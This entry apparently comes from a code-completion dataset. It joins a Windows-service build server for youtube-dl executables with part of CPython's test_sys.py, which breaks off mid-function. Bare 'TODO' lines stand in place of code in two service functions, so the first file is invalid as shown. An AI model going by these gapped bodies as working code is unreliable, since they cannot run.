def _ctypes_array(c_type, py_array):
ar = (c_type * len(py_array))()
ar[:] = py_array
return ar
def win_OpenSCManager():
res = advapi32.OpenSCManagerW(None, None, SC_MANAGER_ALL_ACCESS)
if not res:
raise Exception('Opening service manager failed - '
'are you running this as administrator?')
return res
def win_install_service(service_name, cmdline):
manager = win_OpenSCManager()
try:
h = advapi32.CreateServiceW(
manager, service_name, None,
SC_MANAGER_CREATE_SERVICE, SERVICE_WIN32_OWN_PROCESS,
SERVICE_AUTO_START, SERVICE_ERROR_NORMAL,
cmdline, None, None, None, None, None)
if not h:
raise OSError('Service creation failed: %s' % ctypes.FormatError())
advapi32.CloseServiceHandle(h)
finally:
advapi32.CloseServiceHandle(manager)
def win_uninstall_service(service_name):
manager = win_OpenSCManager()
try:
h = advapi32.OpenServiceW(manager, service_name, DELETE)
if not h:
raise OSError('Could not find service %s: %s' % (
service_name, ctypes.FormatError()))
try:
if not advapi32.DeleteService(h):
raise OSError('Deletion failed: %s' % ctypes.FormatError())
finally:
advapi32.CloseServiceHandle(h)
finally:
advapi32.CloseServiceHandle(manager)
def win_service_report_event(service_name, msg, is_error=True):
with open('C:/sshkeys/log', 'a', encoding='utf-8') as f:
f.write(msg + '\n')
event_log = advapi32.RegisterEventSourceW(None, service_name)
if not event_log:
raise OSError('Could not report event: %s' % ctypes.FormatError())
try:
type_id = 0x0001 if is_error else 0x0004
event_id = 0xc0000000 if is_error else 0x40000000
lines = _ctypes_array(LPTSTR, [msg])
if not advapi32.ReportEventW(
event_log, type_id, 0, event_id, None, len(lines), 0,
lines, None):
raise OSError('Event reporting failed: %s' % ctypes.FormatError())
finally:
advapi32.DeregisterEventSource(event_log)
def win_service_handler(stop_event, *args):
try:
raise ValueError('Handler called with args ' + repr(args))
TODO
except Exception as e:
tb = traceback.format_exc()
msg = str(e) + '\n' + tb
win_service_report_event(service_name, msg, is_error=True)
raise
def win_service_set_status(handle, status_code):
svcStatus = SERVICE_STATUS()
svcStatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS
svcStatus.dwCurrentState = status_code
svcStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP
svcStatus.dwServiceSpecificExitCode = 0
if not advapi32.SetServiceStatus(handle, ctypes.byref(svcStatus)):
raise OSError('SetServiceStatus failed: %r' % ctypes.FormatError())
def win_service_main(service_name, real_main, argc, argv_raw):
try:
# args = [argv_raw[i].value for i in range(argc)]
stop_event = threading.Event()
handler = HandlerEx(functools.partial(win_service_handler, stop_event))
h = advapi32.RegisterServiceCtrlHandlerExW(service_name, handler, None)
if not h:
raise OSError('Handler registration failed: %s' %
ctypes.FormatError())
TODO
except Exception as e:
tb = traceback.format_exc()
msg = str(e) + '\n' + tb
win_service_report_event(service_name, msg, is_error=True)
raise
def win_service_start(service_name, real_main):
try:
cb = START_CALLBACK(
functools.partial(win_service_main, service_name, real_main))
dispatch_table = _ctypes_array(SERVICE_TABLE_ENTRY, [
SERVICE_TABLE_ENTRY(
service_name,
cb
),
SERVICE_TABLE_ENTRY(None, ctypes.cast(None, START_CALLBACK))
])
if not advapi32.StartServiceCtrlDispatcherW(dispatch_table):
raise OSError('ctypes start failed: %s' % ctypes.FormatError())
except Exception as e:
tb = traceback.format_exc()
msg = str(e) + '\n' + tb
win_service_report_event(service_name, msg, is_error=True)
raise
def main(args=None):
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--install',
action='store_const', dest='action', const='install',
help='Launch at Windows startup')
parser.add_argument('-u', '--uninstall',
action='store_const', dest='action', const='uninstall',
help='Remove Windows service')
parser.add_argument('-s', '--service',
action='store_const', dest='action', const='service',
help='Run as a Windows service')
parser.add_argument('-b', '--bind', metavar='<host:port>',
action='store', default='localhost:8142',
help='Bind to host:port (default %(default)s)')
options = parser.parse_args(args=args)
if options.action == 'install':
fn = os.path.abspath(__file__).replace('v:', '\\\\vboxsrv\\vbox')
cmdline = '%s %s -s -b %s' % (sys.executable, fn, options.bind)
win_install_service(SVCNAME, cmdline)
return
if options.action == 'uninstall':
win_uninstall_service(SVCNAME)
return
if options.action == 'service':
win_service_start(SVCNAME, main)
return
host, port_str = options.bind.split(':')
port = int(port_str)
print('Listening on %s:%d' % (host, port))
srv = BuildHTTPServer((host, port), BuildHTTPRequestHandler)
thr = threading.Thread(target=srv.serve_forever)
thr.start()
input('Press ENTER to shut down')
srv.shutdown()
thr.join()
def rmtree(path):
for name in os.listdir(path):
fname = os.path.join(path, name)
if os.path.isdir(fname):
rmtree(fname)
else:
os.chmod(fname, 0o666)
os.remove(fname)
os.rmdir(path)
#==============================================================================
class BuildError(Exception):
def __init__(self, output, code=500):
self.output = output
self.code = code
def __str__(self):
return self.output
class HTTPError(BuildError):
pass
class PythonBuilder(object):
def __init__(self, **kwargs):
pythonVersion = kwargs.pop('python', '2.7')
try:
key = _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, r'SOFTWARE\Python\PythonCore\%s\InstallPath' % pythonVersion)
try:
self.pythonPath, _ = _winreg.QueryValueEx(key, '')
finally:
_winreg.CloseKey(key)
except Exception:
raise BuildError('No such Python version: %s' % pythonVersion)
super(PythonBuilder, self).__init__(**kwargs)
class GITInfoBuilder(object):
def __init__(self, **kwargs):
try:
self.user, self.repoName = kwargs['path'][:2]
self.rev = kwargs.pop('rev')
except ValueError:
raise BuildError('Invalid path')
except KeyError as e:
raise BuildError('Missing mandatory parameter "%s"' % e.args[0])
path = os.path.join(os.environ['APPDATA'], 'Build archive', self.repoName, self.user)
if not os.path.exists(path):
os.makedirs(path)
self.basePath = tempfile.mkdtemp(dir=path)
self.buildPath = os.path.join(self.basePath, 'build')
super(GITInfoBuilder, self).__init__(**kwargs)
class GITBuilder(GITInfoBuilder):
def build(self):
try:
subprocess.check_output(['git', 'clone', 'git://github.com/%s/%s.git' % (self.user, self.repoName), self.buildPath])
subprocess.check_output(['git', 'checkout', self.rev], cwd=self.buildPath)
except subprocess.CalledProcessError as e:
raise BuildError(e.output)
super(GITBuilder, self).build()
class YoutubeDLBuilder(object):
authorizedUsers = ['fraca7', 'phihag', 'rg3', 'FiloSottile']
def __init__(self, **kwargs):
if self.repoName != 'youtube-dl':
raise BuildError('Invalid repository "%s"' % self.repoName)
if self.user not in self.authorizedUsers:
raise HTTPError('Unauthorized user "%s"' % self.user, 401)
super(YoutubeDLBuilder, self).__init__(**kwargs)
def build(self):
try:
subprocess.check_output([os.path.join(self.pythonPath, 'python.exe'), 'setup.py', 'py2exe'],
cwd=self.buildPath)
except subprocess.CalledProcessError as e:
raise BuildError(e.output)
super(YoutubeDLBuilder, self).build()
class DownloadBuilder(object):
def __init__(self, **kwargs):
self.handler = kwargs.pop('handler')
self.srcPath = os.path.join(self.buildPath, *tuple(kwargs['path'][2:]))
self.srcPath = os.path.abspath(os.path.normpath(self.srcPath))
if not self.srcPath.startswith(self.buildPath):
raise HTTPError(self.srcPath, 401)
super(DownloadBuilder, self).__init__(**kwargs)
def build(self):
if not os.path.exists(self.srcPath):
raise HTTPError('No such file', 404)
if os.path.isdir(self.srcPath):
raise HTTPError('Is a directory: %s' % self.srcPath, 401)
self.handler.send_response(200)
self.handler.send_header('Content-Type', 'application/octet-stream')
self.handler.send_header('Content-Disposition', 'attachment; filename=%s' % os.path.split(self.srcPath)[-1])
self.handler.send_header('Content-Length', str(os.stat(self.srcPath).st_size))
self.handler.end_headers()
with open(self.srcPath, 'rb') as src:
shutil.copyfileobj(src, self.handler.wfile)
super(DownloadBuilder, self).build()
class CleanupTempDir(object):
def build(self):
try:
rmtree(self.basePath)
except Exception as e:
print('WARNING deleting "%s": %s' % (self.basePath, e))
super(CleanupTempDir, self).build()
class Null(object):
def __init__(self, **kwargs):
pass
def start(self):
pass
def close(self):
pass
def build(self):
pass
class Builder(PythonBuilder, GITBuilder, YoutubeDLBuilder, DownloadBuilder, CleanupTempDir, Null):
pass
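# Builder glues the mixins together via cooperative multiple inheritance:
# every mixin's build() does its own step and then calls super().build(), so
# Builder().build() walks the MRO above -- clone the repository and check out
# the requested revision (GITBuilder), run "setup.py py2exe" with the selected
# Python (YoutubeDLBuilder), stream the requested file back to the client
# (DownloadBuilder) and finally remove the temporary build tree
# (CleanupTempDir), with Null terminating the chain.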
class BuildHTTPRequestHandler(BaseHTTPRequestHandler):
actionDict = {'build': Builder, 'download': Builder} # They're the same, no more caching.
def do_GET(self):
path = urlparse.urlparse(self.path)
paramDict = dict([(key, value[0]) for key, value in urlparse.parse_qs(path.query).items()])
action, _, path = path.path.strip('/').partition('/')
if path:
path = path.split('/')
if action in self.actionDict:
try:
builder = self.actionDict[action](path=path, handler=self, **paramDict)
builder.start()
try:
builder.build()
finally:
builder.close()
except BuildError as e:
self.send_response(e.code)
msg = str(e).encode('UTF-8')
self.send_header('Content-Type', 'text/plain; charset=UTF-8')
self.send_header('Content-Length', len(msg))
self.end_headers()
self.wfile.write(msg)
except HTTPError as e:
self.send_response(e.code, str(e))
else:
self.send_response(500, 'Unknown build method "%s"' % action)
else:
self.send_response(500, 'Malformed URL')
#==============================================================================
if __name__ == '__main__':
main()
|
test_sys.py
|
import builtins
import codecs
import gc
import locale
import operator
import os
import struct
import subprocess
import sys
import sysconfig
import test.support
from test import support
from test.support import os_helper
from test.support.script_helper import assert_python_ok, assert_python_failure
from test.support import threading_helper
import textwrap
import unittest
import warnings
# count the number of test runs, used to create unique
# strings to intern in test_intern()
INTERN_NUMRUNS = 0
DICT_KEY_STRUCT_FORMAT = 'n2BI2n'
class DisplayHookTest(unittest.TestCase):
def test_original_displayhook(self):
dh = sys.__displayhook__
with support.captured_stdout() as out:
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del builtins._
with support.captured_stdout() as out:
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
# sys.displayhook() requires arguments
self.assertRaises(TypeError, dh)
stdout = sys.stdout
try:
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
finally:
sys.stdout = stdout
def test_lost_displayhook(self):
displayhook = sys.displayhook
try:
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
finally:
sys.displayhook = displayhook
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
with support.swap_attr(sys, 'displayhook', baddisplayhook):
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
class ExceptHookTest(unittest.TestCase):
def test_original_excepthook(self):
try:
raise ValueError(42)
except ValueError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
self.assertRaises(TypeError, sys.__excepthook__)
def test_excepthook_bytes_filename(self):
# bpo-37467: sys.excepthook() must not crash if a filename
# is a bytes string
with warnings.catch_warnings():
warnings.simplefilter('ignore', BytesWarning)
try:
raise SyntaxError("msg", (b"bytes_filename", 123, 0, "text"))
except SyntaxError as exc:
with support.captured_stderr() as err:
sys.__excepthook__(*sys.exc_info())
err = err.getvalue()
self.assertIn(""" File "b'bytes_filename'", line 123\n""", err)
self.assertIn(""" text\n""", err)
self.assertTrue(err.endswith("SyntaxError: msg\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
class SysModuleTest(unittest.TestCase):
def tearDown(self):
test.support.reap_children()
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (ascii(err), ascii(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_recovery(self):
if hasattr(sys, 'gettrace') and sys.gettrace():
self.skipTest('fatal error if run with a trace function')
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for depth in (50, 75, 100, 250, 1000):
try:
sys.setrecursionlimit(depth)
except RecursionError:
# Issue #25274: The recursion limit is too low at the
# current recursion depth
continue
# Issue #5392: test stack overflow after hitting recursion
# limit twice
with self.assertRaises(RecursionError):
f()
with self.assertRaises(RecursionError):
f()
finally:
sys.setrecursionlimit(oldlimit)
@test.support.cpython_only
def test_setrecursionlimit_recursion_depth(self):
# Issue #25274: Setting a low recursion limit must be blocked if the
# current recursion depth is already higher than limit.
from _testinternalcapi import get_recursion_depth
def set_recursion_limit_at_depth(depth, limit):
recursion_depth = get_recursion_depth()
if recursion_depth >= depth:
with self.assertRaises(RecursionError) as cm:
sys.setrecursionlimit(limit)
self.assertRegex(str(cm.exception),
"cannot set the recursion limit to [0-9]+ "
"at the recursion depth [0-9]+: "
"the limit is too low")
else:
set_recursion_limit_at_depth(depth, limit)
oldlimit = sys.getrecursionlimit()
try:
sys.setrecursionlimit(1000)
for limit in (10, 25, 50, 75, 100, 150, 200):
set_recursion_limit_at_depth(limit, limit)
finally:
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
@threading_helper.reap_threads
def test_current_frames(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
@threading_helper.reap_threads
def test_current_exceptions(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_exceptions(), and verifies that the entries
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
while True:
try:
raise ValueError("oops")
except ValueError:
if leave_g.wait(timeout=support.LONG_TIMEOUT):
break
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_exceptions()
for tid in d:
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
self.assertEqual((None, None, None), d.pop(main_id))
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
exc_type, exc_value, exc_tb = d.pop(thread_id)
stack = traceback.extract_stack(exc_tb.tb_frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertTrue(sourceline.startswith("if leave_g.wait("))
# Reap the spawned thread.
leave_g.set()
t.join()
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
for arg in sys.argv:
self.assertIsInstance(arg, str)
self.assertIsInstance(sys.orig_argv, list)
for arg in sys.orig_argv:
self.assertIsInstance(arg, str)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.platlibdir, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global INTERN_NUMRUNS
INTERN_NUMRUNS += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(INTERN_NUMRUNS)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize",
"dont_write_bytecode", "no_user_site", "no_site",
"ignore_environment", "verbose", "bytes_warning", "quiet",
"hash_randomization", "isolated", "dev_mode", "utf8_mode",
"warn_default_encoding")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
attr_type = bool if attr == "dev_mode" else int
self.assertEqual(type(getattr(sys.flags, attr)), attr_type, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
self.assertIn(sys.flags.utf8_mode, {0, 1, 2})
def assert_raise_on_new_sys_type(self, sys_attr):
# Users are intentionally prevented from creating new instances of
# sys.flags, sys.version_info, and sys.getwindowsversion.
arg = sys_attr
attr_type = type(sys_attr)
with self.assertRaises(TypeError):
attr_type(arg)
with self.assertRaises(TypeError):
attr_type.__new__(attr_type, arg)
def test_sys_flags_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
# Skip if not being run on Windows.
test.support.get_attribute(sys, "getwindowsversion")
self.assert_raise_on_new_sys_type(sys.getwindowsversion())
@test.support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(os_helper.FS_NONASCII,
'requires OS support of non-ASCII encodings')
@unittest.skipUnless(sys.getfilesystemencoding() == locale.getpreferredencoding(False),
'requires FS encoding to match locale')
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % os_helper.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(os_helper.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a non existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def c_locale_get_error_handler(self, locale, isolated=False, encoding=None):
# Force the POSIX locale
env = os.environ.copy()
env["LC_ALL"] = locale
